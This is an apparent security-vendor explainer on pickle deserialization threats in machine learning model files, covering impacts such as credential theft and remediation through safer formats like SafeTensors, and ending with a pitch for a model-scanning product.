-
-

Understanding Model Threats

This resource is designed to provide detailed information on various threat categories, helping you understand and mitigate potential risks in AI and machine learning systems.

Deserialization Threats

Deserialization threats occur when untrusted data or code is used to reconstruct objects, leading to potential exploitation. In AI and machine learning systems, this can result in malicious actors injecting harmful code during the deserialization process, exploiting vulnerabilities to gain unauthorized access or manipulate your systems behavior. Understanding deserialization threats is crucial for securing data integrity and preventing unauthorized code execution in your AI models.

Overview

Deserialization threats in AI and machine learning systems pose significant security risks, particularly in models serialized with the default tool in Python, Pickle.

If a model reportedly has this issue, it means:

  1. The model is serialized using Pickle
  2. The model contains potentially malicious code which will run when the model is loaded.

Pickle is the original serialization Python module used for serializing and deserializing Python objects to share between processes or other computers. While convenient, Pickle poses significant security risks when used with untrusted data, as it can execute arbitrary code during deserialization. This makes it vulnerable to remote code execution attacks if an attacker can control the serialized data.

In this case, loading the model will execute the code, and whatever malicious instructions have been inserted into it.

Key Points:

  1. Model serialization converts trained models to a storable format
  2. Many frameworks use Python's pickle for serialization
  3. pickle executes any embedded Python code when deserializing
  4. Attackers can inject malicious code into pickled models
  5. Loading compromised models runs the malicious code
  6. Only load models from trusted sources or use safer formats

Background Information

Further reading:

  1. Never a dill moment: Exploiting machine learning pickle files.
  2. https://protectai.com/blog/announcing-modelscan
  3. https://protectai.com/guardian

Impact

This attack can harm your organization in the following ways:

  1. Sharing data scientist / company github credentials with the attacker.
  2. Sharing data scientist / company cloud credentials, resulting in IP theft of data and other models, all the way to cloud take over attacks.
  3. Altering the behavior of expected models; allowing fraud, model performance impacts, and adversarial by-passes.
  4. It can even be used to corrupt other models, by leveraging credentials to rewrite known model assets within your environments.

How The Attack Works:

Remediation

If possible, use a different model format like SafeTensors in order to remove this type of code injection attack from impacting your work entirely.

If not possible, reach out to the model creator and alert them that the model has failed our scan. You can even link to the specific page on our Insights Database to provide our most up to date findings.

The model provider should also report what they did to correct this issue as part of their release notes.

Protect AI's security scanner detects threats in model files
With Protect AI's Guardian you can scan models for threats before ML developers download them for use, and apply policies based on your risk tolerance.
Learn more